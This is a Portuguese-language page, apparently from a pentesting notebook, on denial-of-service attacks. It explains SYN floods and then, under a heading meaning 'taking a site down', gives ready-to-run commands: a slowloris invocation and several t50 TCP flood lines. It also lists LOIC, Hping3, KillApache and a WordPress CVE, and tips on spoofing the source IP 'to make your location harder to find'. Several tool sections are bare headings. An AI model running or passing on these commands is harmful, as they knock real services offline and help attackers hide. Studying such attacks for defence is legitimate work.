DoS / DDoS
Ataque do tipo DoS (Denial of Service) ocorre quando causa indisponibilidade em algum serviço, enviando uma quantidade alta de requisições inundando (flood) o servidor. Processos de loop infinito, ou falhas no serviço que também causam indisponibilidade, também são considerados DoS.
A diferença entre o DoS e o DDoS (Distributed Denial of Service), é que o DoS conta com um único host realizando o ataque, enquanto o DDoS conta com várias máquinas (geralmente zumbis de botnet) realizando o ataque e derrubando assim o servidor.
O processo acontece geralmente com o Three-way Handshake:
O cliente envia um pacote SYN (Synchronize) para o servidor
O servidor devolve um pacote SYN / ACK para o cliente
O cliente envia um ACK (Acknowledge) de volta ao servidor
No ataque DDoS, esse processo não é completado, pois ao receber o pacote SYN / ACK do servidor, o cliente (atacante) ignora esse pacote e começa novamente o processo enviando um SYN. Como esse processo é feito com diversas máquinas simultaneamente, o servidor não aguenta a quantidade de requisições e acaba se tornando indisponível.
OBS.: Utilize o site www.isup.me, para ver se o site esta no ar.
Derrubando site
Slowloris
./slowloris --dns <ip> -p 80 --timeout 10 -num 5000 --cacheT50
# OBS.: Caso queira executar todos os protocolos sequencialmente, utilze "--protocol T50"
sudo t50 --flood -p tcp -- <ip>
sudo t50 --flood --dport <port> -- <ip>
sudo t50 <ip> --flood -S --turbo --dport <port>
sudo t50 <ip> --flood -S --protocol TCP --dport <port> --turbo
sudo t50 --flood --turbo <ip> --dport <port> -S --protocol TCPLOIC
Para executar, digite:
OBS: Caso não tenha instalado, vá no diretório do LOIC e execute os seguintes comandos abaixo:
SYN Flood
C4
Hping3
Essa técnica não tem muito poder para inundar, mas dependendo da configuração do host alvo, pode derrubar
KillApache
OBS.: Utilize --rand-source, caso queira que sua máquina utilize um IP randômico, para falsificar seu IP real e dificultar a sua localização.
WordPress
CVE-2018-6389
Sites
Last updated
Was this helpful?